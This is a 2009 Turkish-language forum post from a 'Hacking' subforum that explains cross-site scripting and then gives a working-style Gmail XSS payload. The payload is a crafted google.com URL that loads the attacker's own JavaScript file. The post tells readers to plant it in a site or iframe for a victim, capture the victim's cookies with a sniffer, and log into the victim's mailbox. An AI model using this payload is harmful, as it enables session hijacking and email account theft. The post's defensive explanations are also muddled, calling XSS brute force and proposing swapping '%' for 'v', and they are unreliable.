(Gmail Xss) nedir?¿ bir bakın isterseniz!!

Yağmur7

Sevenlerin; Sevilenlerin Yerine Hos Geldiniz... Dünden; Bugüne ,Bugünden; Yarına....
AnasayfaGaleriAramaSSSKayıt OlÜye ListesiKullanıcı GruplarıGiriş yap

Paylaş | 
 

 (Gmail Xss) nedir?¿ bir bakın isterseniz!!

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
OkAn



Erkek
Mesaj Sayısı : 306
Yaş : 25
NerDen : Hatay/Antakya
İş/Hobiler : Müzik Dinlemek (Rap; Rock); Web Tasarım.
<fieldset> <legend>Kısa Bilgiler</l :
KiŞİSeL iLeTi : Madem ki ayrılığa hüküm yemiş bu yürek o zaman yaşamak için ölemek gerek...
İL : Hatay

Character sheet
Tecrübe:
150/150  (150/150)
MesajKonu: (Gmail Xss) nedir?¿ bir bakın isterseniz!!   Perş. Ocak 08, 2009 6:41 pm

S.A.

ilk önce XSS saldırısı nedir onu acıklayalım..

Cross Site scripting olarak adlandırılır..

victim’in üye olduğu herhangi bir sitedeki hesabının, owner tarafından belirli kodlarla scriptlere gömülen saldırı türüdür.. Hackerın deneme-yanılma bir tür brutue attack yaparak bulmasıyla meydana gelir..

Hacker, başka bir scriptten, domainden veya hesaptan, XSS açığının bulunduğu siteye session bilgilerini ele geçirmesine ortam sağlar..

bu XSS (Cross Site scripting) açığı daha çok Mail sistemlerinde karşımıza çıkar.. Bunun en büyük sebebi ise; XSS açığına günümüzdeki bir çok web uygulamalarında rastlanması ve ücretsiz güvenlik açığı tarama yazılımları ile kolayca bulunabilmesidir..


Bu bug’a en büyük çözüm ise; XSS (Cross Site scripting) açığı bulunan scriptin yazılım kodlarının düzeltilmesidir.. Kullanılan scriptte, user’lardan alınan girdiler, mutlaka kontrol edilmelidir.. Bunun sayesinde web-mail güvenlik açıklarına sebebiyet veren; XSS (Cross Site scripting) - SQL Injection - Buffer 0werflow gibi bug’lar rahatça fixlenebilecektir..

Örnek verecek olursak; hackerın XSS veya SQL Inj. için kullanacağımız kodlar arasında % > < ile başlayan karakterler bulunmaktadır.. Bu tür karakterlerin olduğu scriptlerde girilen verinin encode edilmesi gerekebilir.. Yani kısaca kullanılan "%" karakteri yerine v harfi uygulanırsa, böylece hacker başarısız olur..

Gelelim son olarak GOOGLE ürünü olan gmail.com servisinde XSS Açığına..

gmail.com hesabına sahip victim’i hacklemek için; kurbana vereceğim kodları yedirmeniz gerekmektedir.. Bu kodu victim’e yedirmek size kalmış tabii ki.. Herhangi bir siteye gömerekte yollayabilirsiniz, kullanılan scripte (ASP, PHP, vs) encode ederekte gömebilirsiniz veya sitenizde iframe olarak verebilirsiniz...

Kod;

http://www.google.com/reviews/w/confirm?url=http://volqan.us/root/index.php?">/XSS src= "http://sitendeki-JS-dosyanin adresi> &q=000&c=http://www.google.com/searchhl=en&q=000&btnG=Search&submit=VoLqaN">

(URL’leri kendi adresinize göre düzeltiniz)

Kurbana yedirdikten sonra gelen cerezleri, kendi cerezlerinizle editleyerek victim’in mailine giriş yapabilirsiniz..

Not: js dosya için, sniffer’ınızın olması gerekli

Kısa bir süre önce gmail hesabımı bu yolla kaptırmıstım : ) demek ki iş’e yarıyormus, neyse mühim olan "niçin hacklendim" değil "nasıl hacklendim"

GOOGLE’a ait gmail’deki bu açığın kapanması an meselesidir.. Hotmail gibi aylarca süre
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.yagmur7.com
 
(Gmail Xss) nedir?¿ bir bakın isterseniz!!
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» 1.Hidrokinezi Nedir?
» Bugün Sizi Anlatan Söz Nedir? :)
» WOLFTEAM İLE İLGİLİ HERKEZİN KAFASIN YORAN KP ...
» Z İ Y A P A Ş A
» Kırık Saç Uçları

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Yağmur7 :: Hacking :: Msn Hack-
Buraya geçin:  
Yetkinforum.com | Bilgi | Astrology, Medium, Supernatural | © phpBB | Bedava yardımlaşma forumu | Haberleşme | Suistimalı göstermek | Ücretsiz blog